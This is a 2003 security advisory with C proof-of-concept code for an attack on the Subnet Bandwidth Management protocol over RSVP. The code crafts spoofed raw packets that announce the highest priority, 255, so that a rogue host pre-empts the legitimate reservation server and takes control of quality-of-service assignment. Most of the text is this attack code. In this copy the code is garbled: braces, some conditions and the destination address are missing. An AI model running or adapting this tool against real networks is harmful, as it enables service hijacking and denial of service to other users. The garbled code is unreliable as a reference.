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Subnet Bandwidth Management (SBM) Protocol subject to attack via the Resource Reservation Protocol (RSVP)

Network Penetration
Copyright (c) 2003 Ste Jones

Subnet Bandwidth Management (SBM) Protocol subject to attack via the 
Resource Reservation Protocol (RSVP)


The resource reservation protocol (RSVP) is used within the Subnet 
Bandwidth Management protocol (RFC 2814) and is vulnerable to allowing a 
rogue host hijack control of a server via the use of priority assignemnt. 
By specifying a higher priority than the current RSVP server would allow 
the current server to be pre-empted and a rogue one take its place.

How the attack works

Send I_AM_WILLING RSVP packets to be the resource resvervation protocol 
server to indicate that the the source host is willing to be a RSVP server.

Send I_AM_DSBM RSVP packets to indicate that the source address has a 
priority of 255 (1 byte - thus highest possible priority). If the server 
has a lower priority, it will be pre-empted and the source address will 
take over and act as the resource reservation server.  

For politceness four I_AM_WILLING packers are sent, followed by a 
I_AM_DSBM packet every five seconds after that. This should ensure that 
while the I_AM_DSBM packets are being sent the orignal RSVP server would 
not handle resoure priority assignment. Tested against a Windows 2000 RSVP 
server, but as this is a protocol attack it is assumed that would work 
against any RSVP server.

For more information see http://support.microsoft.com/?kbid=228830
For more information see http://support.microsoft.com/?kbid=247101

Further Attacks Possible
A spoofed server could allow different hosts to have a different level of 
quality of service (QoS), either giving a higher level priority to a host 
or reducing the priority of a video link or a VoIP connection for example. 

Proof of concept code

//Network Penetration
//ste jones root@networkpenetration.com
//Proof of concept code for attack against RSVP / SBM (RFC 2814)
//compile: gcc rsvp.c -Wall -o RSVP_DoS
//Allows spoofing of source IP with -s
//Tested on linux against win2k server
//You will need to be root to launch the attack as we are using raw sockets

 * Resource ReserVation Protocol Munger
 * multicast IP
 * IP protocol number 0x2e for RSVP
 * RSVP Header
 * Version = 4bits
 * flags = 4 bits
 * message type = 8 bits = 67 = I_AM_DSBM
 * RSVP checksum = 16 bits = set to 0's 
 * TTL = 8 bits = 1 on multicast
 * Reserved = 8 bits
 * RSVP length = 16 bits
 * + data
 * Data header
 * Length = 16 bits
 * Class = 8 bits
 * type = 8 bits
 * Obj contents 

 *Proof of concept - doesn;t check if RSVP priority of server assumes lower
#include <netinet/in.h>
#include <stdlib.h>
#include <unistd.h>
#include <getopt.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <errno.h>
#include <string.h>
#include <arpa/inet.h>

void usage(char *progname);
void startattack(void);
unsigned short in_chksum(unsigned short *pts, int nbytes);

struct rsvphead{
	int flags:4;
	int version:4;
	char type:8;
	int checksum:16;
	char ttl:8;
	char reserved:8;
	int length:16;

struct rsvpdata{
	char buf[40];

struct header{
	struct iphdr ip;
	struct rsvphead rhead;
	struct rsvpdata rdata;

struct in_addr spoofed;

int main(int argc, char *argv[])
	int c;
	printf("RSVP Munger by Ste Jones from NetworkPenetration.com\n");
	opterr = 0; //stop error messages from command line
	while ((c=getopt(argc, argv, "s:")) != -1){
			case 's':	if(!inet_aton(optarg, &spoofed)){
						printf("Malformed IP 
address: %s\n",optarg);
			default:	usage(argv[0]);
void startattack(void)
	struct header heada;
	struct sockaddr_in sin;
	int sock;
	int on;
	int sinlen;
	int willing;
	unsigned char *sourceip;
	on = 1;
	willing = 4; //send willing four times then I_AM_DBSM
	printf("\nSending %d I_AM_WILLING packets followed by I_AM_DSBM 
packets every 5 seconds\n\n", willing);
		memset(&heada, '\0', sizeof(heada));
		if(willing) printf("Creating I_AM_WILLING packet\n");
		else printf("Creating I_AM_DSBM packet\n");

		heada.ip.ihl = 5;
		heada.ip.version = 4;
		heada.ip.tos = 0xc0; //same options as set by Microsoft 
		if(willing) heada.ip.tot_len = htons(56);
		else heada.ip.tot_len = htons(64);
		heada.ip.id = 0x0000; //checksum calculate later
		heada.ip.frag_off = 0;
		heada.ip.ttl = 1; //multicast uses ttl of 1
		heada.ip.protocol = 0x2e; //RSVP protocol number
		heada.ip.check = 0;
			heada.ip.saddr = spoofed.s_addr;
		else heada.ip.saddr = 0; //let kernel decide
		heada.ip.daddr = inet_addr("");
		sourceip = (unsigned char *)&heada.ip.saddr;
		heada.rhead.flags   = 0;
		heada.rhead.version = 1;
		if(willing) heada.rhead.type    = 0x42; //I_AM_WILLING
		else heada.rhead.type    = 0x43; //I_AM_DSBM
		heada.rhead.checksum= 0x0000; //checksum calculated later
		heada.rhead.ttl     = 0x01;
		heada.rhead.reserved= 0x00;
		if(willing) heada.rhead.length = 0x2400;
		else heada.rhead.length  = 0x2c00;
		heada.rdata.buf[0]  = 0x00;//length
		heada.rdata.buf[1]  = 0x08;//length
		heada.rdata.buf[2]  = 0x2a;//0x2a01 = DSBM IP ADDR 
		heada.rdata.buf[3]  = 0x01;
		heada.rdata.buf[4]  = sourceip[0];//IP address
		heada.rdata.buf[5]  = sourceip[1];//if not spoofed DSBM IP 
ADDR = 0
		heada.rdata.buf[6]  = sourceip[2];//
		heada.rdata.buf[7]  = sourceip[3];//
		heada.rdata.buf[8]  = 0x00;//length
		heada.rdata.buf[9]  = 0x0c;//length
		heada.rdata.buf[10]  = 0xa1;//0a101 = RSVP_HOP_L2, IEEE 
canonical addr
		heada.rdata.buf[11]  = 0x01;
		heada.rdata.buf[12]  = 0x00; //mac addr
		heada.rdata.buf[13]  = 0x11; //
		heada.rdata.buf[14]  = 0x22; //
		heada.rdata.buf[15]  = 0x33; //
		heada.rdata.buf[16]  = 0x44; //
		heada.rdata.buf[17]  = 0x55; //
		heada.rdata.buf[18]  = 0x00; //
		heada.rdata.buf[19]  = 0x00; //
		heada.rdata.buf[20]  = 0x00; //length
		heada.rdata.buf[21]  = 0x08; //length
		heada.rdata.buf[22]  = 0x2b; // 0x2b01 = SMB_Priority
		heada.rdata.buf[23]  = 0x01; //
		heada.rdata.buf[24]  = 0x00; //priority
		heada.rdata.buf[25]  = 0x00; //priority
		heada.rdata.buf[26]  = 0x00; //priority
		if(!willing)heada.rdata.buf[27]  = 0xff; //priority 255
		else heada.rdata.buf[27] = 0xff; //priority 
		//priority = 255 
		//highest possible priority
		//if server has lower priority vulernable to DoS
			heada.rdata.buf[28]  = 0x00; //length
			heada.rdata.buf[29]  = 0x08; //length
			heada.rdata.buf[30]  = 0x2c; //0x2c01 = DSBM timer 
			heada.rdata.buf[31]  = 0x01;
			heada.rdata.buf[32]  = 0x00; //retransmit time
			heada.rdata.buf[33]  = 0x00; //
			heada.rdata.buf[34]  = 0x0f; //0x0f?
			heada.rdata.buf[35]  = 0x05; //time 5 seconds

		heada.ip.check = in_chksum((unsigned short *)&heada.ip, 
		sin.sin_family = AF_INET;
		sin.sin_port = htons(0); 
		sin.sin_addr.s_addr = inet_addr("");

		if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
			printf("Socket error %s\n",strerror(errno));

		if((setsockopt(sock,IPPROTO_IP, IP_HDRINCL, &on, sizeof
(on))) < 0){
			printf("Setsockopt error %s\n",strerror(errno));
		sinlen = sizeof(sin);
			if(sendto(sock, &heada, 56, 0, (struct sockaddr *)
&sin, sinlen) != 56){
				printf("Sento error\n");
			printf("Sent I_AM_WILLING packet\n");
			if(sendto(sock, &heada, 64, 0, (struct sockaddr *)
&sin, sinlen) != 64){
				printf("Sento error\n");
		printf("Sent I_AM_DBSM packet\n");

		if(willing) willing--;

void usage(char *progname)
	printf("\n%s\n", progname);
	printf("\t-s <ip address> Spoof source IP address\n");

unsigned short in_chksum(unsigned short *pts, int nbytes)
        register long sum;
        u_short oddbyte;
        register u_short answer;
        sum = 0;
        while(nbytes > 1){
                sum += *pts++;
                nbytes -=2;
        if(nbytes == 1){
                oddbyte = 0;
                *((u_char *) &oddbyte) = *(u_char *)pts;
                sum += oddbyte;
        sum = (sum >> 16) + (sum &0xffff);
        sum += (sum >>16);
        answer = ~sum;